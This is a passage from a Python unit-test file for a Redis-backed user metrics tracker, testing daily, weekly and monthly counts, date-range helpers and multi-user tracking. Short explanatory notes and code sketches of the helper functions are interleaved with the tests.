ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=9), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric2, datetime.datetime(year=2012, month=4, day=11), inc_amt=2))
counts = self._backend.get_counts([(user_id, metric,), (user_id, metric2,)], start_date=start_date, end_date=end_date)
#check the counts for each of the metrics
eq_(len(counts), 2)
eq_(counts[0], 4)
eq_(counts[1], 2)
def test_clear_all(self):
user_id = 1234
metric = "badge:25"
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=7), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=9), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=5, day=11), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=6, day=18), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=30)))
redis_client = self._backend.get_backend()
#keys not matching the prefix should not be deleted
redis_client.set("foo", "bar")
ok_(not len(list(itertools.chain(*redis_client.keys()))) == 0)
self._backend.clear_all()
ok_(len(list(itertools.chain(*redis_client.keys()))) == 1)
def test_get_closest_week(self):
"""
Gets the closest Monday to the provided date.
"""
date_april_1 = datetime.date(year=2012, month=4, day=1)
date_april_2 = datetime.date(year=2012, month=4, day=2)
date_april_7 = datetime.date(year=2012, month=4, day=7)
date_april_8 = datetime.date(year=2012, month=4, day=8)
date_april_9 = datetime.date(year=2012, month=4, day=9)
monday_march_26 = datetime.date(year=2012, month=3, day=26)
monday_april_2 = datetime.date(year=2012, month=4, day=2)
monday_april_9 = datetime.date(year=2012, month=4, day=9)
eq_(self._backend._get_closest_week(date_april_1), monday_march_26)
eq_(self._backend._get_closest_week(date_april_2), monday_april_2)
eq_(self._backend._get_closest_week(date_april_7), monday_april_2)
eq_(self._backend._get_closest_week(date_april_8), monday_april_2)
eq_(self._backend._get_closest_week(date_april_9), monday_april_9)
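The expectations above pin down the behavior: the result is the Monday of the week containing the given date. A minimal sketch of that computation (the backend's actual implementation may differ):

```python
import datetime

def closest_week(date):
    # Monday of the week containing `date` (Monday has weekday() == 0)
    return date - datetime.timedelta(days=date.weekday())

print(closest_week(datetime.date(2012, 4, 1)))  # 2012-03-26 (a Monday)
```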
def test_metric_by_month_over_several_months(self):
user_id = 1234
metric = "badge:25"
from_date = datetime.date(year=2012, month=4, day=2)
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=7), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=9), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=5, day=11), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=6, day=18), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=30)))
series, values = self._backend.get_metric_by_month(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-01"], 7)
eq_(values["2012-05-01"], 2)
eq_(values["2012-06-01"], 3)
eq_(values["2012-07-01"], 0)
eq_(values["2012-08-01"], 0)
def test_metric_by_month_over_several_months_crossing_year_boundry(self):
user_id = 1234
metric = "badge:25"
from_date = datetime.date(year=2011, month=12, day=1)
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=8), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=30), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=1, day=1), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=1, day=5), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=7)))
series, values = self._backend.get_metric_by_month(user_id, metric, from_date, limit=6)
eq_(len(series), 6)
eq_(values["2011-12-01"], 6)
eq_(values["2012-01-01"], 5)
eq_(values["2012-02-01"], 0)
eq_(values["2012-03-01"], 0)
eq_(values["2012-04-01"], 1)
eq_(values["2012-05-01"], 0)
def test_metric_by_week_over_several_weeks(self):
user_id = 1234
metric = "badge:25"
from_date = datetime.date(year=2012, month=4, day=2)
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=7), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=9), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=11), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=18), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=30)))
series, values = self._backend.get_metric_by_week(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
def test_metric_by_week_over_several_weeks_crossing_year_boundry(self):
user_id = 1234
metric = "badge:25"
from_date = datetime.date(year=2011, month=12, day=1)
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=8), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=30), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=1, day=1), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=1, day=5), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=7)))
series, values = self._backend.get_metric_by_week(user_id, metric, from_date, limit=6)
eq_(len(series), 6)
eq_(values["2011-11-28"], 0)
eq_(values["2011-12-05"], 4)
eq_(values["2011-12-12"], 0)
eq_(values["2011-12-19"], 0)
eq_(values["2011-12-26"], 4)
eq_(values["2012-01-02"], 3)
def test_get_weekly_date_range(self):
date = datetime.date(year=2011, month=11, day=1)
result = self._backend._get_weekly_date_range(date, datetime.timedelta(weeks=12))
eq_(len(result), 2)
eq_(result[0], datetime.date(year=2011, month=11, day=1))
eq_(result[1], datetime.date(year=2012, month=1, day=1))
def test_get_daily_date_range(self):
date = datetime.date(year=2011, month=11, day=15)
result = self._backend._get_daily_date_range(date, datetime.timedelta(days=30))
eq_(len(result), 2)
eq_(result[0], datetime.date(year=2011, month=11, day=15))
eq_(result[1], datetime.date(year=2011, month=12, day=1))
def test_get_daily_date_range_spans_month_and_year(self):
date = datetime.date(year=2011, month=11, day=15)
result = self._backend._get_daily_date_range(date, datetime.timedelta(days=65))
eq_(len(result), 3)
eq_(result[0], datetime.date(year=2011, month=11, day=15))
eq_(result[1], datetime.date(year=2011, month=12, day=1))
eq_(result[2], datetime.date(year=2012, month=1, day=1))
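The two daily-range tests above pin down the helper's behavior: it returns the start date plus the first day of every later month the window touches. The backend's actual `_get_daily_date_range` is not shown here, so the following is a sketch inferred solely from those assertions (the function name and structure are assumptions):

```python
import datetime

def get_daily_date_range(start, delta):
    """Return `start` plus the first day of every later month inside
    [start, start + delta) -- inferred from the tests above, not the
    backend's real `_get_daily_date_range`."""
    end = start + delta
    result = [start]
    # jump to the first day of the next month, repeating until past `end`
    cur = (start.replace(day=1) + datetime.timedelta(days=32)).replace(day=1)
    while cur < end:
        result.append(cur)
        cur = (cur + datetime.timedelta(days=32)).replace(day=1)
    return result
```

With the 65-day window from the test, this yields the three boundaries asserted above.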
def test_metric_by_day(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = "user1234"
metric = "badges:21"
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=30), inc_amt=5))
series, values = self._backend.get_metric_by_day(user_id, metric, date, 30)
eq_(len(series), 30)
eq_(len(values.keys()), 30)
eq_(values["2011-12-05"], 2)
eq_(values["2011-12-08"], 3)
eq_(values["2011-12-30"], 5)
def test_metric_by_count_start_end_date(self):
start_date = datetime.date(year=2011, month=9, day=1)
end_date = datetime.date(year=2011, month=11, day=1)
user_id = "user1234"
metric = "badges:21"
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=5, day=30), inc_amt=5))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=7, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=8, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=9, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=10, day=1), inc_amt=5))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=11, day=5), inc_amt=2))
count = self._backend.get_count(user_id, metric, start_date=start_date, end_date=end_date)
eq_(count, 8)
def test_parse_and_process_metrics(self):
series = [datetime.datetime(year=2011, month=5, day=30), datetime.datetime(year=2011, month=7, day=8), datetime.datetime(year=2011, month=8, day=5),
datetime.datetime(year=2011, month=9, day=8), datetime.datetime(year=2011, month=9, day=8), datetime.datetime(year=2011, month=10, day=1)]
metrics = [[None, None, None, None, None, None]]
new_series, new_metrics = self._backend._parse_and_process_metrics(series, metrics)
eq_(set(['2011-10-01', '2011-07-08', '2011-09-08', '2011-08-05', '2011-05-30']), new_series)
eq_({'2011-10-01': 0, '2011-07-08': 0, '2011-09-08': 0, '2011-08-05': 0, '2011-05-30': 0}, new_metrics)
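The test above implies that `_parse_and_process_metrics` collapses the raw series/metrics pair into date-keyed buckets, treating `None` rows as zero and merging duplicate dates. A minimal sketch of that behavior, inferred from the assertions (the real helper may differ):

```python
import datetime

def parse_and_process_metrics(series, metrics):
    """Collapse raw (datetime, value) pairs into date-keyed totals.
    Sketch inferred from the test above; None values count as 0 and
    duplicate dates are merged into one bucket."""
    keys = [dt.strftime("%Y-%m-%d") for dt in series]
    flat = [m for row in metrics for m in row]
    values = {}
    for key, val in zip(keys, flat):
        values[key] = values.get(key, 0) + (int(val) if val is not None else 0)
    return set(values.keys()), values
```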
def test_metric_by_count_start_end_date_within_a_month(self):
start_date = datetime.date(year=2011, month=9, day=1)
end_date = datetime.date(year=2011, month=9, day=15)
user_id = "user1234"
metric = "badges:21"
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=5, day=30), inc_amt=5))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=7, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=8, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=9, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=10, day=1), inc_amt=5))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=11, day=5), inc_amt=2))
count = self._backend.get_count(user_id, metric, start_date=start_date, end_date=end_date)
eq_(count, 3)
def test_metric_by_count_start_end_date_with_metric_on_end_date(self):
start_date = datetime.date(year=2011, month=9, day=1)
end_date = datetime.date(year=2011, month=9, day=8)
user_id = "user1234"
metric = "badges:21"
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=5, day=30), inc_amt=5))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=7, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=8, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=9, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=10, day=1), inc_amt=5))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=11, day=5), inc_amt=2))
count = self._backend.get_count(user_id, metric, start_date=start_date, end_date=end_date)
eq_(count, 3)
def test_metric_by_count_start_end_date_with_metric_on_start_date(self):
start_date = datetime.date(year=2011, month=9, day=8)
end_date = datetime.date(year=2011, month=9, day=15)
user_id = "user1234"
metric = "badges:21"
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=5, day=30), inc_amt=5))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=7, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=8, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=9, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=10, day=1), inc_amt=5))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=11, day=5), inc_amt=2))
count = self._backend.get_count(user_id, metric, start_date=start_date, end_date=end_date)
eq_(count, 3)
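Taken together, the three start/end-date tests above show that `get_count` treats both endpoints as inclusive: a metric tracked exactly on `start_date` or `end_date` is counted. A sketch of that counting rule (an illustration, not the backend's implementation):

```python
import datetime

def count_in_range(events, start_date, end_date):
    """events: iterable of (datetime, amount). Both endpoints are
    inclusive, matching the three get_count tests above."""
    return sum(amt for dt, amt in events
               if start_date <= dt.date() <= end_date)
```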
@raises(Exception)
def test_get_metrics_invalid_args(self):
date = datetime.date(year=2011, month=12, day=1)
self._backend.get_metrics([], date, group_by="leapyear")
def test_get_count_in_time_period(self):
start_date = datetime.date(year=2012, month=4, day=5)
end_date = datetime.date(year=2012, month=4, day=9)
user_id = "user1234"
metric = "badges:21"
metric2 = "badge:22"
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=7), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=9), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric2, datetime.datetime(year=2012, month=4, day=11), inc_amt=2))
count = self._backend.get_count(user_id, metric, start_date=start_date, end_date=end_date)
eq_(6, count)
def test_get_metrics_by_day(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = "user1234"
metric = "badges:21"
metric2 = "badge:22"
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=30), inc_amt=5))
ok_(self._backend.track_metric(user_id, metric2, datetime.datetime(year=2011, month=12, day=5), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric2, datetime.datetime(year=2011, month=12, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric2, datetime.datetime(year=2011, month=12, day=30), inc_amt=5))
results = self._backend.get_metrics([(user_id, metric,), (user_id, metric2,)], date, limit=30, group_by="day")
#metric
eq_(len(results[0][0]), 30)
eq_(len(results[0][1].keys()), 30)
eq_(results[0][1]["2011-12-05"], 2)
eq_(results[0][1]["2011-12-08"], 3)
eq_(results[0][1]["2011-12-30"], 5)
#metric 2
eq_(len(results[1][0]), 30)
eq_(len(results[1][1].keys()), 30)
eq_(results[1][1]["2011-12-05"], 3)
eq_(results[1][1]["2011-12-08"], 3)
eq_(results[1][1]["2011-12-30"], 5)
def test_get_metrics_by_week(self):
user_id = 1234
metric = "badge:25"
metric2 = "badge:26"
from_date = datetime.date(year=2012, month=4, day=2)
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=7), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=9), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric2, datetime.datetime(year=2012, month=4, day=11), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric2, datetime.datetime(year=2012, month=4, day=18), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric2, datetime.datetime(year=2012, month=4, day=30)))
results = self._backend.get_metrics([(user_id, metric,), (user_id, metric2)], from_date, limit=5, group_by="week")
#metric 1
eq_(len(results[0][0]), 5)
eq_(results[0][1]["2012-04-02"], 4)
eq_(results[0][1]["2012-04-09"], 2)
eq_(results[0][1]["2012-04-16"], 0)
eq_(results[0][1]["2012-04-23"], 0)
eq_(results[0][1]["2012-04-30"], 0)
#metric 2
eq_(len(results[1][0]), 5)
eq_(results[1][1]["2012-04-02"], 0)
eq_(results[1][1]["2012-04-09"], 2)
eq_(results[1][1]["2012-04-16"], 3)
eq_(results[1][1]["2012-04-23"], 0)
eq_(results[1][1]["2012-04-30"], 1)
def test_track_metric_for_multi_users_at_the_same_time(self):
user_id = 1234
user_id2 = "user:5678"
metric = "badge:25"
from_date = datetime.date(year=2012, month=4, day=2)
ok_(self._backend.track_metric([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=7), inc_amt=2))
ok_(self._backend.track_metric([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=9), inc_amt=2))
ok_(self._backend.track_metric([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=11), inc_amt=2))
ok_(self._backend.track_metric([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=18), inc_amt=3))
ok_(self._backend.track_metric([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=30)))
series, values = self._backend.get_metric_by_week(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
series, values = self._backend.get_metric_by_week(user_id2, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
def test_track_metric_multiple_metrics_at_the_same_time(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = "user1234"
metric = "badges:21"
metric2 = "badge:22"
#track some metrics
ok_(self._backend.track_metric(user_id, [metric, metric2], datetime.datetime(year=2011, month=12, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, [metric, metric2], datetime.datetime(year=2011, month=12, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, [metric, metric2], datetime.datetime(year=2011, month=12, day=30), inc_amt=5))
results = self._backend.get_metrics([(user_id, metric,), (user_id, metric2,)], date, limit=30, group_by="day")
#metric
eq_(len(results[0][0]), 30)
eq_(len(results[0][1].keys()), 30)
eq_(results[0][1]["2011-12-05"], 2)
eq_(results[0][1]["2011-12-08"], 3)
eq_(results[0][1]["2011-12-30"], 5)
#metric 2
eq_(len(results[1][0]), 30)
eq_(len(results[1][1].keys()), 30)
eq_(results[1][1]["2011-12-05"], 2)
eq_(results[1][1]["2011-12-08"], 3)
eq_(results[1][1]["2011-12-30"], 5)
def test_track_multi_metrics_for_multi_users_at_the_same_time(self):
user_id = 1234
user_id2 = "user:5678"
metric = "metric1"
metric2 = "metric2"
from_date = datetime.date(year=2012, month=4, day=2)
ok_(self._backend.track_metric([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=7), inc_amt=2))
ok_(self._backend.track_metric([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=9), inc_amt=2))
ok_(self._backend.track_metric([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=11), inc_amt=2))
ok_(self._backend.track_metric([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=18), inc_amt=3))
ok_(self._backend.track_metric([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=30)))
series, values = self._backend.get_metric_by_week(user_id, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
series, values = self._backend.get_metric_by_week(user_id2, metric, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
series, values = self._backend.get_metric_by_week(user_id, metric2, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
series, values = self._backend.get_metric_by_week(user_id2, metric2, from_date, limit=5)
eq_(len(series), 5)
eq_(values["2012-04-02"], 4)
eq_(values["2012-04-09"], 4)
eq_(values["2012-04-16"], 3)
eq_(values["2012-04-23"], 0)
eq_(values["2012-04-30"], 1)
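The multi-user and multi-metric tests above rely on `track_metric` accepting either a scalar or a list for both the user and metric arguments and applying the increment to every (user, metric) pair. A sketch of that fan-out normalization (names are assumptions; only the pairing behavior is taken from the tests):

```python
def fan_out(user_ids, metrics):
    """Normalize scalar-or-list user/metric arguments into the full
    list of (user, metric) pairs each track call should update."""
    users = user_ids if isinstance(user_ids, (list, tuple)) else [user_ids]
    mets = metrics if isinstance(metrics, (list, tuple)) else [metrics]
    return [(u, m) for u in users for m in mets]
```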
def test_set_metric_by_day(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = 1234
metric = "metric1"
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=5), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=8), 3, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=30), 5, sync_agg=False))
series, values = self._backend.get_metric_by_day(user_id, metric, date, 30)
eq_(len(series), 30)
eq_(len(values.keys()), 30)
eq_(values["2011-12-05"], 2)
eq_(values["2011-12-08"], 3)
eq_(values["2011-12-30"], 5)
def test_set_metric_by_day_incr_then_set(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = 1234
metric = "metric1"
from_date = datetime.date(year=2012, month=4, day=2)
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=30), inc_amt=5))
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=5), 1, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=8), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=30), 4, sync_agg=False))
series, values = self._backend.get_metric_by_day(user_id, metric, date, 30)
eq_(len(series), 30)
eq_(len(values.keys()), 30)
eq_(values["2011-12-05"], 1)
eq_(values["2011-12-08"], 2)
eq_(values["2011-12-30"], 4)
def test_set_metric_by_day_set_then_incr(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = 1234
metric = "metric1"
from_date = datetime.date(year=2012, month=4, day=2)
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=5), 1, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=8), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, metric, datetime.datetime(year=2011, month=12, day=30), 4, sync_agg=False))
#track some metrics
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=8), inc_amt=3))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2011, month=12, day=30), inc_amt=5))
series, values = self._backend.get_metric_by_day(user_id, metric, date, 30)
eq_(len(series), 30)
eq_(len(values.keys()), 30)
eq_(values["2011-12-05"], 3)
eq_(values["2011-12-08"], 5)
eq_(values["2011-12-30"], 9)
def test_set_metric_by_day_multiple_metrics_at_the_same_time(self):
date = datetime.date(year=2011, month=12, day=1)
user_id = "user1234"
metric = "badges:21"
metric2 = "badge:22"
#set some metrics
ok_(self._backend.set_metric_by_day(user_id, [metric, metric2], datetime.datetime(year=2011, month=12, day=5), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, [metric, metric2], datetime.datetime(year=2011, month=12, day=8), 3, sync_agg=False))
ok_(self._backend.set_metric_by_day(user_id, [metric, metric2], datetime.datetime(year=2011, month=12, day=30), 5, sync_agg=False))
results = self._backend.get_metrics([(user_id, metric,), (user_id, metric2,)], date, limit=30, group_by="day")
#metric
eq_(len(results[0][0]), 30)
eq_(len(results[0][1].keys()), 30)
eq_(results[0][1]["2011-12-05"], 2)
eq_(results[0][1]["2011-12-08"], 3)
eq_(results[0][1]["2011-12-30"], 5)
#metric 2
eq_(len(results[1][0]), 30)
eq_(len(results[1][1].keys()), 30)
eq_(results[1][1]["2011-12-05"], 2)
eq_(results[1][1]["2011-12-08"], 3)
eq_(results[1][1]["2011-12-30"], 5)
def test_set_metric_by_day_for_multi_users_at_the_same_time_with_sync(self):
user_id = 1234
user_id2 = "user:5678"
metric = "badge:25"
from_date = datetime.date(year=2012, month=4, day=2)
#set some metrics
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=5), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=7), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=9), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=11), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=18), 3, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], metric, datetime.datetime(year=2012, month=4, day=30), 1, sync_agg=False))
#user_id
series, values = self._backend.get_metric_by_day(user_id, metric, from_date, limit=30)
eq_(len(series), 30)
eq_(values["2012-04-05"], 2)
eq_(values["2012-04-07"], 2)
eq_(values["2012-04-09"], 2)
eq_(values["2012-04-11"], 2)
eq_(values["2012-04-18"], 3)
eq_(values["2012-04-30"], 1)
#user_id2
series, values = self._backend.get_metric_by_day(user_id2, metric, from_date, limit=30)
eq_(len(series), 30)
eq_(values["2012-04-05"], 2)
eq_(values["2012-04-07"], 2)
eq_(values["2012-04-09"], 2)
eq_(values["2012-04-11"], 2)
eq_(values["2012-04-18"], 3)
eq_(values["2012-04-30"], 1)
def test_set_metric_by_day_for_multi_metrics_for_multi_users_at_the_same_time(self):
user_id = 1234
user_id2 = "user:5678"
metric = "metric1"
metric2 = "metric2"
from_date = datetime.date(year=2012, month=4, day=2)
#set some metrics
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=5), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=7), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=9), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=11), 2, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=18), 3, sync_agg=False))
ok_(self._backend.set_metric_by_day([user_id, user_id2], [metric, metric2], datetime.datetime(year=2012, month=4, day=30), 1, sync_agg=False))
#user_id, metric
series, values = self._backend.get_metric_by_day(user_id, metric, from_date, limit=30)
eq_(len(series), 30)
eq_(values["2012-04-05"], 2)
eq_(values["2012-04-07"], 2)
eq_(values["2012-04-09"], 2)
eq_(values["2012-04-11"], 2)
eq_(values["2012-04-18"], 3)
eq_(values["2012-04-30"], 1)
#user_id2, metric
series, values = self._backend.get_metric_by_day(user_id2, metric, from_date, limit=30)
eq_(len(series), 30)
eq_(values["2012-04-05"], 2)
eq_(values["2012-04-07"], 2)
eq_(values["2012-04-09"], 2)
eq_(values["2012-04-11"], 2)
eq_(values["2012-04-18"], 3)
eq_(values["2012-04-30"], 1)
#user_id, metric2
series, values = self._backend.get_metric_by_day(user_id, metric2, from_date, limit=30)
eq_(len(series), 30)
eq_(values["2012-04-05"], 2)
eq_(values["2012-04-07"], 2)
eq_(values["2012-04-09"], 2)
eq_(values["2012-04-11"], 2)
